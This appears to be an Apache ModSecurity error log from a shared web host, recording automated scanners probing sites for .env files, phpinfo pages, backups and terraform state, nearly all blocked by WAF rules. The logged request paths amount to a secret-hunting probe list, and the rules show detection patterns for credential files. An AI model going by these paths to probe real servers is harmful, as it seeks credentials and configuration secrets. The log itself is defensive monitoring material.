[Tue May 26 14:48:51.314090 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php.php"] [unique_id "ahVle7EQDDtxJNiDrdTekAAAyWk"]
[Tue May 26 14:48:51.316435 2026] [security2:error] [pid 648203:tid 648213] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php_info.php"] [unique_id "ahVle7EQDDtxJNiDrdTekQAAkgk"]
[Tue May 26 14:48:51.323157 2026] [security2:error] [pid 648203:tid 648327] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/phpinfo.php"] [unique_id "ahVle7EQDDtxJNiDrdTekwABAHs"]
[Tue May 26 14:48:51.338980 2026] [security2:error] [pid 648203:tid 648324] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/portal/.env"] [unique_id "ahVle7EQDDtxJNiDrdTelQAAmHg"]
[Tue May 26 14:48:51.343994 2026] [security2:error] [pid 648203:tid 648291] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/prod/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemAABA1c"]
[Tue May 26 14:48:51.348208 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/product/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemgAAtXQ"]
[Tue May 26 14:48:51.365580 2026] [security2:error] [pid 648203:tid 648215] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/production/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemwAAvQs"]
[Tue May 26 14:48:51.458996 2026] [security2:error] [pid 648203:tid 648230] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/project/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeowAAwRo"]
[Tue May 26 14:48:51.460322 2026] [security2:error] [pid 648203:tid 648328] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public-api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTepQAAwXw"]
[Tue May 26 14:48:51.462103 2026] [security2:error] [pid 648203:tid 648222] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public/.env"] [unique_id "ahVle7EQDDtxJNiDrdTepgAAwRI"]
[Tue May 26 14:48:51.464270 2026] [security2:error] [pid 648203:tid 648228] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/public/phpinfo.php"] [unique_id "ahVle7EQDDtxJNiDrdTepwAA6xg"]
[Tue May 26 14:48:51.484267 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public_html/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeqQAA1n4"]
[Tue May 26 14:48:51.485378 2026] [security2:error] [pid 648203:tid 648232] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/qa/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeqwAA1hw"]
[Tue May 26 14:48:51.779714 2026] [security2:error] [pid 648203:tid 648280] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/s3/.env.bak"] [unique_id "ahVle7EQDDtxJNiDrdTe1wAA4Uw"]
[Tue May 26 14:48:51.903605 2026] [security2:error] [pid 648203:tid 648267] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6QAA9j8"]
[Tue May 26 14:48:51.903733 2026] [security2:error] [pid 648203:tid 648252] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6AAA9jA"]
[Tue May 26 14:48:51.912710 2026] [security2:error] [pid 648203:tid 648270] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/backend/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6wAA_EI"]
[Tue May 26 14:48:52.047984 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/service/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTe_AAA9S0"]
[Tue May 26 14:48:52.049092 2026] [security2:error] [pid 648203:tid 648292] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/services/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTe_QAA9Vg"]
[Tue May 26 14:48:52.071664 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shared/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfBwABAmY"]
[Tue May 26 14:48:52.073316 2026] [security2:error] [pid 648203:tid 648296] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shop/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfCAABAlw"]
[Tue May 26 14:48:52.193050 2026] [security2:error] [pid 648203:tid 648302] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfFQAA5mI"]
[Tue May 26 14:48:52.228930 2026] [security2:error] [pid 648203:tid 648313] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stage/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIgAA1m0"]
[Tue May 26 14:48:52.229053 2026] [security2:error] [pid 648203:tid 648297] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/srv/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIQAA1l0"]
[Tue May 26 14:48:52.231292 2026] [security2:error] [pid 648203:tid 648395] [client 176.65.139.236:45488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIwAAAMM"]
[Tue May 26 14:48:52.240821 2026] [security2:error] [pid 648203:tid 648456] [client 176.65.139.234:58612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ameritradeng.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfJAAAAQA"]
[Tue May 26 14:48:52.250603 2026] [security2:error] [pid 648203:tid 648294] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/staging/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfJQAA1Vo"]
[Tue May 26 14:48:52.343534 2026] [security2:error] [pid 648203:tid 648205] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stg/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfLQAAxQE"]
[Tue May 26 14:48:52.366983 2026] [security2:error] [pid 648203:tid 648312] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stripe/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfNQAAo2w"]
[Tue May 26 14:48:52.374563 2026] [cgid:error] [pid 648203:tid 648213] [remote 195.178.110.199:55984] AH01264: stderr from /home2/onesomzc/public_html/www.landsonlogistics.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:48:52.458290 2026] [security2:error] [pid 648203:tid 648427] [client 216.26.246.18:16397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVle7EQDDtxJNiDrdTenAAAAOM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:52.489041 2026] [security2:error] [pid 648203:tid 648210] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlfLEQDDtxJNiDrdTfPQAA2QY"]
[Tue May 26 14:48:52.493344 2026] [security2:error] [pid 648203:tid 648319] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/test.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfQgAA0nM"]
[Tue May 26 14:48:52.497876 2026] [security2:error] [pid 648203:tid 648388] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfBAAAALw"]
[Tue May 26 14:48:52.499204 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/test/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfQwAA-HQ"]
[Tue May 26 14:48:52.513139 2026] [security2:error] [pid 648203:tid 648318] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/user/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfSgAAt3I"]
[Tue May 26 14:48:52.520467 2026] [security2:error] [pid 648203:tid 648326] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v1/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfTAAA1Ho"]
[Tue May 26 14:48:52.542274 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v2/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfUgAA4X4"]
[Tue May 26 14:48:52.587125 2026] [security2:error] [pid 648203:tid 648232] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v3/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfVAAA3Rw"]
[Tue May 26 14:48:52.783277 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfZgAA_hE"]
[Tue May 26 14:48:52.786414 2026] [security2:error] [pid 648203:tid 648331] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/web/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfagAA6n8"]
[Tue May 26 14:48:52.786411 2026] [security2:error] [pid 648203:tid 648250] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/html/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfZwAA6i4"]
